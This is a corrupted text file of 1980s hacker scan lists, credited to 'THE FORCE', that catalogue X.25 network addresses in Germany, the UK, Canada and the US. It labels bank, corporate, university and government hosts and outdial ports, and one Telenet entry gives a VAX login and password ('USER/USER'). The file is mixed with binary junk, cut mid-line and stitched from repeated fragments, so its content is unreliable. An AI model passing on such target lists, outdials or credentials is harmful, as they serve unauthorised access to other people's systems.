DOS꟡rpa$NJg @ hpNup`dos.libraryH,xNAEQfÏۑ> a3!LJχˆ詡Sás3K9T)]Oc>dž!9 h̩s©©O}̡ˠyO̩O۠aa࿢߯O IOi㻫KOcdžP!áHþ!̩H͆H͇UCᑀQ[߇Q!1ˣ)HņH?ś«ɠ39V)ũ15tPT)ũ3y`)`3K`ĠOX>›>` ¡̀?)]ݠY]ử>ᯔwQeɣ)ᣀö͙O>ᯔᱯᓫa 9)υᵉOC 81 23421920100469 BT-GOLD System 81 23421920100472 BT-GOLD System 72 23421920100473 BT GOLD System 73 23421920100474 BT-GOLD System 74 23421920100475 BT-GOLD System 75 23421920100476 BT-GOLD System 76 23421920100477 BT-GOLD System 77 23421920100478 BT-GOLD System 78 23421920100479 BT-GOLD System 79 23421920100480 BT-GOLD System 80 23421920100481 BT-GOLD System 81 23421920100482 BT-GOLD System 82 23421920100483 BT-GOLD System 83 23421920100484 BT-GOLD System 84 23421920Y=B100485 BT-GOLD System 85 23421920100486 BT-GOLD System 86 23421920100487 BT-GOLD System 87 23421920100490 BT-GOLD System 81 23421920100491 BT-GOLD System 81 23421920100492 BT-GOLG System 81 23421920100493 BT-GOLD System 81 23421920100494 BT-GOLD System 81 23421920100495 BT-GOLD System 81 23421920100496 BT-GOLD System 81 23421920100497 BT-GOLD System 81 23421920100498 BT-GOLD System 81 23421920100499 BT-GOLD System 81 23421920100513 ENQUIRY SERVICE 23421920100515 HOSTESCS public Info Base 23421920100530 HOSTESS closed access 23421920100555 FTP 23421920100600 MULTISTREAM INFORMATION REPORT 23421920100605 ATOMIC CLOCK 23421920100606 ATOMIC CLOCK 23421920100620 PSS ONLINE BILLING INFORMATION SERVICE 23421920100630 23421920100632 TACL 23421920100634 TACL 23421920100655 FTP 23421920100657 FTP 23421920100659 FTP 23421920100660 23421920100662 23421920100690 fax 23421920100691 fax 23421920100692 fax 23421920100694 fax 23421920100700 fax}6 23421920100701 fax 23421920100709 fax 23421920100710 fax 23421920100711 fax 23421920100720 fax 23421920100721 fax 23421920100730 fax 23421920100731 fax 23421920100740 fax 23421920100741 fax 23421920100750 fax 23421920100751 fax 23421920100761 fax 23421920100770 fax 23421920100771 fax 23421920100790 fax 23421920101699 fax 23421920115600 EUROPEAN SPACE AGENCY 'ESA' D A T E X - P 26245400030xxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the depths of - THE REALM - 01/02/1987 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 26245400030029 26245400030035 fax 26245400030041 26245400030046 26245400030071 26245400030090 HP-3000 26245400030104 26245400030105 26245400030110 host 26245400030113 HP-3000 26245400030138 26245400030150 26245400030158 26245400030175 26245400030187 WILLKOMMENG?1 BEI E2000 HAMBURG VAX 26245400030201 HASYLAB-VAX 11/750 VAX/VMS 4.2 26245400030202 HERA MAGNET MEASUREMENT VAX 750 26245400030215 26245400030259 26245400030261 26245400030296 DFH2001I 26245400030502 26245400030519 fax 26245400030566 DFH2001I 26245400030578 PRIMENET 20.0.4 DREHH D A T E X - P 26245621040xxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the depths of - THE REALM -  qoWD 09/01/1987 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 26245621040000 TELEBOX 26245621040014 ACF/VTAM 26245621040025 OEVA COMPUTER BEREIT 26245621040026 host 26245621040027 BASF/FER VAX 8600 26245621040508 VCON0 BASF A6 26245621040516 CN01 26245621040532 26245621040580 DYNAPAC MULTI-PAD.25 26245621040581 DYNAPAC MULTI-PAD.25 26245621040582 D A T E X - P 26245890040xxx Sprint, By: ---===} THE FORCE {===--- ] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the depths of - THE REALM - 09/01/1987 Last Update: 29/02/87 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 26245890040004 ALTOS UNIX V (Chat system) 26245890040006 M&T 26245890040081 NOS SOFTWARE SYSTEM MUERCHENER RECHENZENTRUM 26245890040185 fax 26245890040207 IABG DETEZENTRUM OHOBRUNN 26245890040220 host 26245890040221 host 26245890040225 ջ)QNTEC MUNICH UNIX 4.2 26245890040262 BDS UNIX 26245890040266 fax 26245890040281 DATUS PAD 26245890040510 26245890040522 PLESSEY SEMICONDUCTORS VAX 26245890040542 D D X - P 44013612xxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From The depths of - THE REALM - 01/04/1987 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 44013612065  A REALM - 29/01/1987 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Plese note that DIALNET NUA's are not accessible via through all pads. These NUA's were sprinted from PRIMECON SYSTEM 41. 900025 WORLDCOM COMPUTER NETWORK System 25 900032 PRIMECON NETWORK System 32 900033 PRIMECON NETWORK System 33 900034 PRIMECON NETWORK System 34 900037 PRIMECON NETWORK System 37 900038 PRIMECON NETWORK System 38 900039 PRIME \C}CON NETWORK System 39 900040 PRIMECON NETWORK System 40 900041 PRIMECON NETWORK System 41 900042 PRIMECON NETWORK System 42 900044 PRIMECON NETWORK System 44 900045 PRIMECON NETWORK System 45 900046 PRIMECON NETWORK System 46 900047 PRIMECON NETWORK System 47 900048 PRIMECON NETWORK System 48 900049 PRIMECON NETWORK System 49 900050 PRIMECON NETWORK System 50 900051 PRIMECON NETWORK System 51 900052 PRIMECON NETWORK System 52 900053 PRIMECON NETWORK System 53 900054 PRIoKYMECON NETWORK System 54 900055 PRIMECON NETWORK System 55 900056 PRIMECON NETWORK System 56 900057 PRIMECON NETWORK System 57 900058 PRIMECON NETWORK System 58 900059 PRIMECON NETWORK System 59 900061 PRIMECON NETWORK System 61 900063 PRIMECON NETWORK System 63 900064 PRIMECON NETWORK System 64 900090 PRIMECON NETWORK System 90 900091 PRIMECON NETWORK System 91 900092 PRIMECON NETWORK System 92 900093 PRIMECON NETWORK System 93 900094 PRIMECON NETWORK System 94 900095 P qiRIMECON NETWORK System 95 900096 PRIMECON NETWORK System 96 900097 PRIMECON NETWORK System 97 900098 PRIMECON NETWORK System 98 900099 PRIMECON NETWORK System 99 P S S 234219200xxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the depths of - THE REALM - 19/01/1987 Updated: 29/02/87 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 234219200001 PRIMENET 18.3 =-EOIN2 TPSYS B-MCH 234219200100 OS4000+RLIX PSS GATEWAY 234219200101 234219200102 host 234219200112 0,994#B APS 234219200118 AUTONET 234219200133 QUANTIME PSS GATEWAY 234219200146 234219200148 OS4000+RLIX PSS GATEWAY 234219200149 UNIVERSITY COLLEGE LONDON TERMINAL GATEWAY 234219200152 CCI QUICKMAIL 234219200169 LONDON 234219200171 234219200183 JAMES CAPEL'S TECHNICAL SERVICES DEPARTMENT 234219200190 PERGAMON INFOLINE 234219200193 BUPA 234219200197 0,99#B APS 23421920 ݮhw0203 234219200206 host 234219200220 234219200233 234219200237 234219200238 234219200256 JBPLC 234219200260 SWIFT LONDON COMMUNICATIONS 234219200270 HP-3000 234219200275 HP-3000 234219200300 UNIVERSITY COLLEGE LONDON 234219200304 234219200390 SNA/SDLC DYNAMIC 234219200394 SIANET 234219201002 234219201004 BT-GOLD System 81 234219201025 PRESTEL 234219201184 CHASE 234219201197 PRIMENET 19.4.10q HQZ 234219201271 PRIMENET 19.4.10q HQX 234219201281 PERGAMON INFOLIN MOE 234219201311 P S S 23421920100xxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the depths of - THE REALM - 04/01/1987 Last Updated: 29/02/87 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 23421920100001 PRESTEL 23421920100002 PRESTEL 23421920100003 PRESTEL 23421920100004 PRESTEL 23421920100005 PRESTEL 23421920100006 PRESTEL 23421920100007 PRESTEL EhT 23421920100008 PRESTEL 23421920100200 23421920100230 23421920100243 23421920100251 23421920100356 23421920100403 BRITISH TELECOM DEVELOPMENT AND BACKUP System 03 23421920100404 BRITISH TELECOM MESSAGE HANDLING System 23421920100417 REV.19 System 17 23421920100418 BT-GOLD System 18 23421920100419 BT-GOLD System 81 23421920100420 BT-GOLD System 81 23421920100421 BT-GOLD System 81 23421920100422 BT-GOLD System 81 23421920100423 BT-GOLD System 81 23421920100424 BT-GOLD SystaC`em 81 23421920100425 BT-GOLD System 81 23421920100426 BT-GOLD System 81 23421920100427 BT-GOLD System 81 23421920100428 BT-GOLD System 81 23421920100429 BT-GOLD System 81 23421920100430 REV.19 System 04 23421920100431 REV.19 System 04 23421920100432 REV.19 System 04 23421920100433 REV.19 System 04 23421920100434 REV.19 System 04 23421920100435 REV.19 System 04 23421920100436 REV.19 System 04 23421920100437 REV.19 System 04 23421920100438 REV.19 System 04 234219Uf;@20100439 REV.19 System 04 23421920100440 BT-GOLD System 81 23421920100441 BT-GOLD system 81 23421920100442 BT-GOLD system 81 23421920100443 BT-GOLD System 81 23421920100444 BT-GOLD System 81 23421920100445 BT-GOLD System 81 23421920100446 BT-GOLD System 81 23421920100447 BT-GOLD System 81 23421920100448 BT-GOLD System 81 23421920100449 BT-GOLD System 81 23421920100450 BT-GOLD System 81 23421920100452 BT-GOLD System 81 23421920100453 BT-GOLD System 81 23421920100454 BT-GOLD System 81 23421920100455 BT-GOLD System 81 23421920100456 BT-GOLD System 81 23421920100457 BT-GOLD System 81 23421920100458 BT-GOLD System 81 23421920100459 BT-GOLD System 81 23421920100460 BT-GOLD System 81 23421920100461 BT-GOLD System 81 23421920100462 BT-GOLD System 81 23421920100463 BT-GOLD System 81 23421920100464 BT-GOLD System 81 23421920100465 BT-GOLD System 81 23421920100466 BT-GOLD System 81 23421920100467 BT-GOLD System 81 23421920100468 BT-GOLD System8Tu00579 302071100583 MICROVMS V4.4 COMPUTER SYSTEM 302071100584 OUTDIAL 302071100585 OUTDIAL 302071100586 OUTDIAL 302071100617 302071100634 302071100638 302071100656 302071100677 302071100683 302071100684 302071100900 OUTDIAL 300 BAUD 302071100901 OUTDIAL 1200 BAUD All the blanks I have not been able to identify. My guess is that most of tham a fax machines or something like that, since there are simmilarities. CATCH YA LATER ----====} THE FORCE {====--- D9¤ A T A P A C 302072100xxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the depths of - THE REALM - 17/01/1987 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 302072100017 302072100018 302072100019 302072100029 302072100055 302072100073 302072100084 302072100127 302072100176 WESTFAIR FOODS LIMITED - REGINA 302072100186 302072100188 30:Y{2072100223 302072100227 302072100229 302072100240 302072100256 302072100257 302072100312 302072100313 302072100328 302072100342 302072100343 host VAX = AGRICULTURE CANADA RECUVAX 302072100349 302072100351 302072100406 302072100414 302072100418 302072100447 302072100465 302072100485 302072100492 302072100493 302072100498 302072100517 DEVELSWITCH SAL 302072100522 302072100528 302072100544 302072100546 AGRITEX 302072100554 302072100555 302072100558 302072100565 302072100568 3020;E>72100570 302072100575 302072100594 302072100596 302072100619 host 302072100665 302072100666 QUEEN CITY CARDLOCK KARDGARD 3000-C MOTOR FUEL MANAGEMENT SYSTEM 302072100672 AGRICULTURE CANADA VAX 302072100684 302072100699 302072100766 302072100776 OUTDIAL 302072100777 OUTDIAL 302072100778 302072100779 OUTDIAL 302072100791 MICROVMS V4.3 VAX 302072100833 302072100866 302072100867 fax 302072100900 OUTDIAL 300 BAUD 302072100901 OUTDIAL 1200 BAUD D A T A P A C 30209160<lb0xxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the depths of - THE REALM - 25/01/1987 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 302091600041 302091600046 302091600047 302091600048 302091600097 ATLAS VAX8600 UNIVERSITY OF TORONTO 302091600124 302091600161 302091600169 DNM121A 302091600181 302091600182 302091600183 302= 091600184 302091600185 302091600186 302091600187 302091600188 302091600189 302091600190 302091600192 302091600193 302091600194 302091600210 302091600212 host 302091600221 302091600222 PRIMENET 19.4.5 ULS 302091600237 302091600281 OUTDIAL 302091600282 OUTDIAL 302091600283 OUTDIAL 302091600284 OUTDIAL 302091600315 OUTDIAL 302091600316 OUTDIAL 302091600317 OUTDIAL 302091600318 OUTDIAL 302091600319 OUTDIAL 302091600391 302091600398 host 302091600416 >hq&~ 302091600901 OUTDIAL 300 BAUD 302091600902 OUTDIAL 1200 BAUD END END91600284 OUTDIAL 30209160031~~~~~~~~~~~~~~~~~~~~~ From the depths of - THE REALM - 25/01/1987 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 302091600041 302091600046 302091600047 302091600048 302091600097 ATLAS VAX8600 UNIVERSITY OF TORONTO 302091600124 302091600161 302091600169 DNM121A 302091600181 302091600182 302091600183 302Ǯystem 61 31033010000563 PRIMECON NETOWRK System 63 31033010000564 PRIMECON NETOWRK System 64 31033010000590 PRIMECON NETWORK System 90 31033010000591 PRIMECON NETWORK System 91 31033010000592 PRIMECON NETOWRK System 92 31033010000593 PRIMECON NETWORK System 93 31033010000594 PRIMECON NETWORK System 94 31033010000595 PRIMECON NETWORK System 95 31033010000596 PRIMECON NETWORK System 96 31033010000597 PRIMECON NETWORK System 97 31033010000598 PRIMECON NETWORK System 98 31033010000599 PR S[IMECON NETWORK System 99 31033010000663 PRIMECON NETWORK System 63 31033010000664 PRIMECON NETWORK System 64 31033010000693 PRIMECON NETWORK System 93 31033010000694 PRIMECON NETWORK System 94 31033010000695 PRIMECON NETWORK System 95 31033010000696 PRIMECON NETWORK System 96 31033010000699 PRIMECON NETWORK System 99 D I A L N E T 9000xx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the depths of - THE L~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the depths of - THE REALM - 02/09/1986 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 31033010000532 PRIMECON NETWORK System 32 31033010000533 PRIMECON NETWORK System 33 31033010000534 PRIMECON NETWORK System 34 31033010000537 PRIMECON NETWORK System 37 31033010000538 PRIMECON NETWORK System 38 31033010000541 PRIMECON NETWORK System 41 31033010000542 PRIMECON NETWORK System 42 3103301$k0000543 PRIMECON NETWORK System 43 31033010000544 PRIMECON NETWORK System 44 31033010000545 PRIMECON NETWORK System 45 31033010000546 PRIMECON NETWORK System 46 31033010000547 PRIMECON NETWORK System 47 31033010000548 PRIMECON NETWORK System 48 31033010000549 PRIMECON NETWORK System 49 31033010000550 PRIMECON NETWORK System 50 31033010000551 PRIMECON NETWORK System 51 31033010000552 PRIMECON NETWORK System 52 31033010000557 PRIMECON NETWORK System 57 31033010000561 PRIMECON NETWORK S-">M600608 T E L E N E T 31109180xxxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From The Depths Of - THE REALM - 28/08/1986 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 311091800030 host system 311091800105 EAASY SABRE T E L E N E T 31109190xxxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.#J)~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the depths of - THE REALM - 30/08/1986 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 311091900031 host system 311091900032 host system 311091900033 host system 311091900034 VCON2 20L03A 311091900043 hosts systems (Terminals: VM, VAX etc) 311091900044 HP-3000 311091900070 HP-3000 311091900604 TSO, OBS, DCICS, PCICS 311091900645 Total Communication System TCOMNET D /$9&/ A T A P A C 302058700xxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the depths of - THE REALM - 10/01/1987 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 302058700010 HP-3000 302058700015 OUTDIAL 302058700016 OUTDIAL 302058700017 OUTDIAL 302058700018 OUTDIAL 302058700900 OUTDIAL 300 BAUD 302058700901 OUTDIAL 1200 BAUD D 0%eW=A T A P A C 302063300xxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the depths of - THE REALM - 102/01/1987 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 302063300131 host 302063300141 302063300142 302063300200 302063300260 302063300261 PRIMENET 19.4.3 PRECL7 302063300298 PRIMENET 19.4.9 PEPPER 302063300313 3020633003141&\)_ 302063300319 302063300334 302063300339 302063300344 host 302063300352 302063300359 302063300371 302063300374 302063300431 OUTDIAL 302063300432 OUTDIAL 302063300433 OUTDIAL 302063300434 OUTDIAL 302063300439 302063300453 302063300457 302063300466 302063300483 THE UNIVERSITY OF CALGARY EDUVAX 302063300900 OUTDIAL 300 BAUD 302063300901 OUTDIAL 1200 BAUD D A T A P A C 302069200xxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~2'f+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the depths of - THE REALM - 20/01/1986 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 302069200030 302069200036 302069200095 302069200291 L.WARDROP & ASSOCIATES VAX 11/750 302069200296 302069200312 302069200321 302069200334 302069200336 302069200346 302069200353 302069200364 302069200366 302069200374 302069200378 ED RIVER COMMUNITY COLLEGE VAX A 3020692003793( 302069200381 302069200392 302069200411 302069200413 302069200417 302069200450 302069200466 302069200492 VCON1 5INI - WINIPEQ MV/400 302069200512 302069200533 302069200656 302069200660 host 302069200669 ATR0 302069200676 302069200684 302069200714 302069200718 302069200719 302069200720 302069200778 302069200779 302069200788 host 302069200856 302069200879 302069200881 302069200884 302069200885 302069200900 OUTDIAL 300 BAUD 302069200901 OUTDIAL 1200 4)sBAUD 302069200910 302069200911 302069200912 D A T A P A C 302067100xxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the depths of - THE REALM - 09/01/1987 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 302067100056 302067100057 302067100086 SEARS CANADA INC.BCSC 302067100118 PRIMENET 20.1.1 UMAVAN 302067100143 302067100255*O 0 PRIMENET 20.0.2 MD.VAN 302067100253 302067100330 302067100361 302067100423 302067100440 302067100482 GATEWAY 302067100489 host 302067100519 J. WALTER THOMPSON VANCOUVER 302067100538 302067100571 302067100610 VANCOUVER VAX 302067100629 MICROVMS V4.2 VAX 302067100630 302067100632 MCKIM ADVERTISING VANCOUVER 302067100641 fax 302067100642 COMINCO TRAIL DATAPAC ACCESS 302067100669 302067100673 302067100692 OUTDIAL 302067100693 OUTDIAL 302067100695 OUTDIAL 3026+!067100752 302067100794 probably a VAX 302067100900 OUTDIAL 300 baud 302067100901 OUTDIAL 1200 baud 302067100766 D A T A P A C 302071100xxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the depths of - THE REALM - 19/01/1987 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 302071100015 302071100037 302071100039 302071100110 3027Ͽ<^071100120 302071100122 302071100169 302071100171 302071100217 302071100218 302071100219 302071100220 302071100270 302071100277 302071100291 302071100292 302071100302 302071100323 host 302071100339 302071100371 302071100376 POTASH CORPORATION OF SASKATCHEWAN 302071100381 host 302071100382 host 302071100383 302071100395 TSO, CMS VM/370 302071100437 302071100446 302071100447 302071100458 302071100473 302071100474 302071100572 302071100578 3020711"-cyS EASYNET VAX.29 DECNET GATEWAY 311060300054 CUBB LIFEAMERICA ONLINE SYSTEM VM 311060300057 host 311060300066 311060300135 GRINNELL CORP. T E L E N E T 311060900xxx NUA'S, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From The depths of - THE REALM - 16/04/1987 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 311060900042 host T E L E N E #. T 31106120xxxx Sprint By ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the Depths of THE REALM 14/08/1986 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 311061200023 HOST (Westlaw) 311061200025 VCON2 09F02D03A 311061200032 host 311061200037 HOST (Westlaw) 311061200039 HOST (westlaw) switch 9,8,7.....wlaw $/!?qa system 311061200047 VCON4 09F06A 311061200052 311061200053 VCON1 09F07A 311061200056 HOST (westlaw) 311061200057 HOST (westlaw) 311061200062 HOST (westlaw) 311061200063 VCON1 09F07D03A 311061200069 host 311061200070 VCON1 23A 311061200072 PRIMENET FSO 311061200073 VCON1 02F03D03A 311061200075 NOS SOFTWARE SYSTEM 311061200076 HOST (Westlaw) 311061200077 VCON2 02F03D08A 311061200078 VCON1 02F03D09A 311061200079 VCON0 02F03D11A 311061200135 Vax, U/N: USER, %0vP/W: USER 311061200157 HOST (Westlaw) 311061200161 VCON1 09F06D04A 311061200230 VCON4 09F06D05A 311061200330 VCON4 09F06D02A T E L E N E T 31106170xxxx Sprint By ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From The Depths of THE REALM Last Updated: 06/04/87 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 311061700020 PRIMENET 19.4.11.A PBN27 31106&1~Z1700022 PRIMENET 19.4.11.A BDSD 311061700023 RSX-11M-PLUS 311061700030 THR GTE-LAN GATEWAY 311061700032 HOST 311061700037 PRIMENET 19.4.11.A BDSH 311061700038 BBN TC-TELENET 311061700047 HOST 311061700048 IRI SYSTEM 4 311061700061 HOST switch char VM for VM/370 311061700062 HOST " " " " " 311061700063 IRI SYSTEM 3 311061700066 PRIMENET 19.4.11.A BDSK 311061700067 IRI SYSTEM 1 311061700072 IRI SYSTEM 2 311061700074 PRIMENET 20.1.1.1os ENB T E L E N E '2R 3T 031107130xxxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the depths of - THE REALM - 22/12/1986 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 311071300029 311071300044 311071300055 TENNECO CORPORATE VM SYSTEM 311071300057 fax 311071300076 V7 311071300079 V7 311071300080 V7 311071300083 311071300100 VCON008F13D06A(3R 311071300172 PRIMENET 19.4.5 RMBBIT IR.HOU 311071300173 PRIMENET 19.4.5 MD.AUS 311071300176 PRIMENET 20.2.0 TRNG.D 311071300351 311071300354 311071300356 311071300358 311071300499 MCI VAX, MIS ACCOUNTING & DEVELOPMENT, ENGINEERING NWIS, KEPUA VAX 311071300641 HP-3000 311071300881 T E L E N E T 031109130xxxx Sprint, by ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From The Depths Of - THE R)4Ih;EALM - 21/08/86 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 311091300032 host system T E L E N E T 031109140xxxx Sprint, By ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From The Depths of - THE REALM - 22/08/1986 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 311091400033 31109*5V1400038 VM/370 PEPSICO 311091400056 311091400131 VM/370 311091400606 VM/370 T E L E N E T 031109150xxxx Sprint, By ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From The Depths of - THE REALM - 23/08/1986 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 311091500052 T E L E N E T 31069160xxxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~+6Dd~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From The Depths of - THE REALM - 25/08/1986 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 311091600030 VCON17 05F07A 311091600032 VCON1 05F03D51A 311091600033 VCON10 05F11A 311091600034 PRIMENET 20.4.4.R2 SACRA 311091600036 host system 311091600040 VCON8 05F7A 311091600041 host system 311091600046 VCON5 05F08D56A 311091600050 VCON0 0,!Y|5F08D52A 311091600051 VCON1 05F16D52A 311091600053 VCON1 05F11D54A 311091600056 VCON1 05F19A 311091600089 VCON1 05F03D57A 311091600131 VCON0 05F14D53A 311091600134 VCON1 05F06D51A 311091600161 VCON2 05F08A 311091600163 VCON0 05F08D51A 311091600164 VCON21 05F08D54A 311091600167 VCON2 05F14B 311091600168 VCON3 05F17D56A 311091600231 VCON5 05F17D53A 311091600232 VCON7 05F17D54A 311091600233 VCON4 05F17D57A 311091600602 VCON4 AOS/VS 311091600607 3110918+o040600066 VCON1 01F03D06A 311040600070 VCON1 01F14D02A 311040600072 VCON2 01F11D02A 311040600073 VCON4 OZEMAN-R.D. 311040600075 VCON4 01F14D03A 311040600131 VCON2 01F05D01A 311040600132 VCON4 01F05D02A 311040600133 VCON4 01F05D03A 311040600134 VCON2 01F14N 311040600135 VCON5 01F15D04A 311040600144 VCON3 01F15D06A 311040600145 VCON25 